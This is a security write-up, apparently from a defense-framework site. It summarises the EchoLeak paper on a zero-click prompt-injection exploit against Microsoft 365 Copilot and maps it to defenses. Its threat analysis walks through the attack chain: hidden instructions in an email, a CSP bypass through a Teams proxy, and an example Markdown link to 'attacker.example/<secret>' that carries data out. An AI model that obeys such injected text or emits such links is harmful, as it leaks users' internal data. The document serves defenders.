Paper Published: Apr 23, 2026

Microsoft "EchoLeak": How One Email Turned Microsoft 365 Copilot into a Zero-Click Data Exfiltration Path

EchoLeak shows how one external email can move from "reference material" to "instructions the model obeys" once Microsoft 365 Copilot retrieves it into the same answer context as internal data. The exploit then hides sensitive data inside a Markdown link or image URL and relies on automatic fetching plus a CSP-allowed Microsoft Teams proxy to send that data out with zero clicks. The defensive lesson is broader than a better classifier: teams need retrieval-time scanning, trust-boundary separation, sink enforcement, and output-layer leak blocking.

Indirect Prompt InjectionData ExfiltrationSink EnforcementAI CopilotsEnterprise AI
7 applicable AIDEFEND defenses
Source: EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System 
By Pavan Reddy and Aditya Sanjay Gujral · Original article: Sep 6, 2025

Threat Analysis

  • Step 1: seed the system with a normal-looking external email. The attacker sends business-style text with hidden instructions. The paper says the wording looked normal enough to evade Microsoft's XPIA classifier.
  • Step 2: wait until Copilot retrieves that email next to internal data. Later, a normal user query pulls that email beside internal mail and files. Once mixed into the same prompt context, the email stops being passive data and starts acting like instructions.
  • Step 3: hide the secret inside Markdown. Copilot is pushed to emit a reference-style Markdown link or image, such as [Project update][ref] plus [ref]: https://attacker.example/<secret>. The visible text looks harmless; the hidden URL carries the secret.
  • Step 4: turn that output into zero-click egress. The chat UI auto-fetches Markdown images. The paper says direct attacker domains were blocked by CSP, so the chain used a CSP-allowed Microsoft Teams preview endpoint to fetch the secret-bearing URL instead.
  • Why this matters: no login, attachment, or click was needed. Microsoft says it fixed the issue before disclosure and saw no evidence of in-the-wild exploitation.

Applicable AIDEFEND Defenses (7)

AID-H-019.005
Value-Level Capability Metadata & Data Flow Sink Enforcement
Very High
This is the clearest place to break the actual exfiltration path. Even if the model has already been influenced by the attacker email, internal values should not be allowed to flow into an external URL, a preview proxy, or any other outbound sink unless policy explicitly allows it. EchoLeak worked because the system treated the URL as syntactically acceptable, not because the destination was actually safe for the data being inserted into it.
AID-H-017
System Prompt Hardening
Very High
The paper's prompt partitioning recommendation maps directly here. External emails should enter the prompt inside clearly marked data-only sections, with explicit instruction precedence stating that outside content is evidence to summarize, not instructions to obey. If Copilot had preserved that boundary, the attacker email would have remained low-trust context instead of becoming a higher-priority directive.
AID-D-014.001
Post-Retrieval Malicious Content Scanning
Very High
EchoLeak only becomes dangerous after the malicious email is pulled back into the live answer context. That is exactly the point where retrieved content should be rescanned as untrusted input before final context assembly. This matters even if the email already passed mail security controls earlier, because retrieval turns stored external content into active model context.
AID-H-020.001
URL Normalization & Allowlist Filtering
High
EchoLeak's last hop depended on model output becoming a live external URL or image fetch. A safe-fetch wrapper should canonicalize generated URLs, verify domains and redirects, and block arbitrary model-generated remote media before the chat surface or proxy makes the request.
AID-D-003.002
Sensitive Information & Data Leakage Detection
High
The final answer should have been scanned before rendering. A response that suddenly contains internal project details inside a URL, a suspicious external image reference, or an unusually structured outbound link is exactly the kind of leak this control is meant to catch. It is not the root-cause fix, but it is a strong last barrier before the UI turns model output into visible or networked content.
AID-H-018.007
Dual-LLM Isolation Pattern
High
This attack depends on the same model both reading raw untrusted email and producing a privileged answer over internal data. A quarantined model can read external emails and produce a structured summary, while a separate privileged model answers the user's question without ever seeing the raw attacker text. That separation sharply reduces the chance that one malicious email can steer the full answer path.
AID-D-001.001
Per-Prompt Content & Obfuscation Analysis
Medium
The XPIA bypass in the paper is a reminder that per-message prompt-injection screening still matters, especially on external emails and other inbound text channels. But it should be treated as an early screening layer, not as the main security boundary. EchoLeak is a good case study in why classifiers help, yet fail open if teams do not also enforce deterministic trust separation and data-flow controls.

What Defenders Should Do Now

  • Inventory every enterprise copilot workflow that can mix external email, chat, or documents with internal files in the same answer context. Flag any workflow that answers sensitive internal questions while still retrieving outside content.
  • Add a retrieval-time scan and trust label to external content. Emails and documents from outside the organization should be rescanned when retrieved, then wrapped in a data-only channel or excluded by default from high-sensitivity tasks.
  • Block model outputs from introducing arbitrary external URLs, remote images, or long secret-bearing query strings. Run sensitive-data and suspicious-link detection before the answer is rendered or logged.
  • Treat preview services, proxy URLs, and browser fetches as data sinks, not as harmless UI features. Audit which domains and proxy paths your copilots are allowed to reach, and remove any path that can forward arbitrary model-generated URLs.
  • Turn this incident into a regression test. Use a harmless synthetic email that tries to smuggle a fake secret into a Markdown link or image, and keep testing until the chain fails at more than one layer.

1 additional consideration

Render-surface egress isolation for AI chat UIs

Beyond the techniques mapped above, teams should also consider a dedicated render-surface policy so model-emitted images, Markdown links, and preview URLs cannot trigger outbound network fetches by default. EchoLeak's last hop only worked because the chat surface and a trusted proxy turned model output into a live request.
Recommendation: Disable automatic remote media loading where possible; apply deny-by-default img-src and connect-src; route any allowed media through a first-party signed proxy; and strip model-generated arbitrary external URLs before render.

Conclusion

EchoLeak matters because it turns prompt injection into a concrete zero-click exfiltration chain instead of a theoretical chatbot oddity. One email became instructions, one answer became a network request, and internal data moved across trust boundaries without a click. AIDEFEND  maps well to the retrieval, prompt-separation, sink-enforcement, and leak-detection layers that could have stopped that chain; the extra design work is making AI chat render surfaces fail closed when model output tries to become outbound traffic.